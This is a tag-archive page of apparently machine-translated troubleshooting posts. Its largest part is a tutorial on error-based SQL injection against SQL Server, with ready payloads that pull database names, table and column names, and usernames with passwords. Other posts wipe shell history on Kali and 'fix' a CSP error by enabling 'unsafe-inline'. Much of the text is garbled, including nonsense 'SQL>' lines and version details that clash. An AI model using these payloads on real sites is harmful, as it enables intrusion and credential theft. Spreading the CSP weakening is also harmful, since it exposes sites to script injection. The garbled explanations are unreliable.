Tag Archives: Network security

HTML + PHP inline execute JavaScript Error [How to Solve]

Error message

read.php:1 Refused to run the JavaScript URL because it violates the following Content Security Policy directive: “script-src ‘self’”. Either the ‘unsafe-inline’ keyword, a hash (‘sha256-…’), or a nonce (‘nonce-…’) is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the ‘unsafe-hashes’ keyword is present.

 

Solution:

Add unsafe-inline in the header

header("Content-Security-Policy: script-src 'self' 'unsafe-inline';);

[Solved] Centos7 xmapp Install Error: error while loading shared libraries: libc.so.6

1. Version information:

CentOS version: CentOS release 6.9 (final)

xmapp version: xampp-linux-x64-5.6.40-1-installer.run

2. Error message:

[root@localhost ~]# /opt/lampp/lampp
egrep: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
egrep: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/bin/bash: error while loading shared libraries: libdl.so.2: cannot open shared object file: No such file or directory
egrep: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory

id: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/share/xampp/xampplib: line 11: test: -ne: unary operator expected
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
XAMPP: egrep: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
netstat: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
egrep: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
netstat: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/bin/httpd: error while loading shared libraries: librt.so.1: cannot open shared object file: No such file or directory
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
XAMPP: hostname: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
egrep: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
netstat: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
XAMPP: /bin/sh: error while loading shared libraries: libdl.so.2: cannot open shared object file: No such file or directory
egrep: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
netstat: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory
/opt/lampp/bin/gettext: error while loading shared libraries: libc.so.6: cannot open shared object file: No such file or directory

3. Solution:

1. Open /opt/lampp/lampp

vim /opt/lampp/lampp

2. Edit
Modify this line

export LD_ASSUME_KERNEL=2.2.5

to

export LD_ASSUME_KERNEL=2.8.0

Find a word in the file [under the command line/keyword, enter to find, enter n to find the next]

[Solved] ENSP Failed to Start AR Device error code: 40

Errors are reported as follows:

My configuration is as follows:

ENSP-1.3

Virtualbox-5.2.32 (only version 5.0-5.2 can be used)

Wireshark-win64-3.0.3

My problem is solved as follows:

First, make sure that the installation paths of the reference tools are on Disk C

Those not in the C disk are reinstalled to the C disk, otherwise there is a high probability of error.

Then import the device package

When you drag it out and start it, you can add a device package. At this time, you can add a device package with the suffix img.

Registering an AR device

Follow the prompts on the help document to register the device.

Select all AR devices and register them.

After registration, exit and restart ENSP.

Inspection

Start successful.

[Solved] kali Execute history -c Error: fc: event not found: – C

Error content: “FC: event not found: – C”

Error reason: Kali’s default shell environment has been changed from bash to Zsh, and history – C needs to run in Bash environment

Method 1: Clear history command

rm -rf /root/.zsh_history
exit

Method 2: Clear history command

cat /dev/null > .zsh_history 
rm .zsh_history
exit

Note: after execution, you need to log in again to take effect

12-web security — error injection based on SQL Server — and, convert, cast

We know that SQL Server is developed by Microsoft, a very good database, can accurately locate the error message, this is very developer friendly, especially for Web security workers, using SQL Server error information to effectively penetrate the target system test.
 
Id =1′ and 1=(@@version)–+;

When executing SQL statement, the database will treat the contents in parentheses of 1=(@@Version) statement as the number of int type. However, @@Version itself is a string of type NVARCHAR. SQL Server will fail to convert NCARCHAR into INIT type and report an error.
 
SQL Server error injection principle is the use of data type conversion error. The character type is converted into a number of characters, but the form of expression is still characters, resulting in the database can not identify the error, at the same time in the process of error will also show the SQL statement query information, such as the database version of the query information combined with the error information back to the page.
 
For example, you can construct a SQL statement by inputing an error query into all table names in the current database:

id=1' and 1=(select top 1 table_name from information_schema.tables)--+


Note that since the = sign precedes the parentheses and the SELECT statement produces more than one result, you need to combine the top statement to limit the result of the query to one, display the result to the Web page by error, and then use the top n statement to query the following table names.
 
 
You can also use the FOR XML PATH and the QUOTENAME statement to display the result as a single line to construct the SQL statement:

select quotename(table_name) from information_schema.tables for xml path('')

 
 
Select * from user where user = ‘user’;

select quotename(column_name) from information_schema.columns where table_name='users' for xml path('')

 
Select * from user where user name = ‘user’ and password = ‘user’;

select username,':',password,'|' from users for xml path('')

 
Usually, the page may not be able to display all the user names and passwords due to the number of characters displayed. Substring function can be used to display the query results in sections, starting from the first character and displaying 250 characters:

select substring((select username,':',password,'|' from users for xml path('')),1,250)

SQL Server databases use the Substring function in the same way as MySQL does.
 
 
Select * from users where user = ‘users’;

 
 

Error injection based on convert and cast functions.

The convert function takes the time to define a datatype (format) in the form of:

convert(data_type(length),data_to_be_converted,style)

Parameters to the convert function:
DATA_TYPE (LENGTH) : Indicates the defined data type, and LENGTH represents the optional length
Data_to_be_converted: time, that is, the value of the need to transform
Style: Represents the output format of the specified time/date
 
 
Convert function:

 
VARCHAR (20) represents the data type defined as VARCHAR with a length of 20, getdate is used to get the current time, 111 represents the time output in year/month/day (i.e. 2020/07/11) format.
 
An error occurs if the convert function converts the database name to an int (such as the SQL statement select convert (int, db_name(), 111)), and the name of the database is also exposed.
 
 
Error injection based on the convert function:

id=1' and 1=convert(int,db_name(),111) --+


For the above SQL statements, the convert function will be the second parameter db_name after () attempts to convert the result of the type int, but because the db_name () returns is nvarchar type, the result of the SQL server cannot converting nvarchar type specified int type, so the convert function will be an error prompt, at the same time will be the second parameter specifies the results of the query of SQL statement together with the error message came out
 
The cast function converts one data type to another. The cast function is a function that converts one data type to another.

cast(expression as data_type)

CAST Parameter Description:
Expression: Any valid SQL Server expression
As: is used to split two parameters. The parameter before as (expression) is the data to be processed, and the parameter after as (data_type) is the data type to be converted
DATA_TYPE: Data types supplied by the target system, including BIGINT and SQL_VARLANT, cannot use user-defined data types
 
The cast function is used as follows:

 
SQL> convert 123456 to int;
 
 
The cast function converts the database name to an int, and the cast function reveals the database name security.

 
 
 
Error injection based on CAST function:

id=1' and 1=cast(host_name() as int) --+


 
 
SQL> select table names from sysobjects; select table names from sysobjects; select table names from sysobjects;

select quotename(name) from sysobjects where xtype='u' for xml path('')


 
 
SQL> select column name from column name;

select quotename(name) from syscolumns where id=(select id from sysobjects where name='users' and xtype='u') for xml path('')


 
 
 
SQL> select * from users where user = ‘user’;

select substring((select username,':',password,'|' from users for xml path('')),1,250)


 
In addition to displaying the username and password piecemeal using the Substring function, you can also display the username and password sequentially using the exclusion method.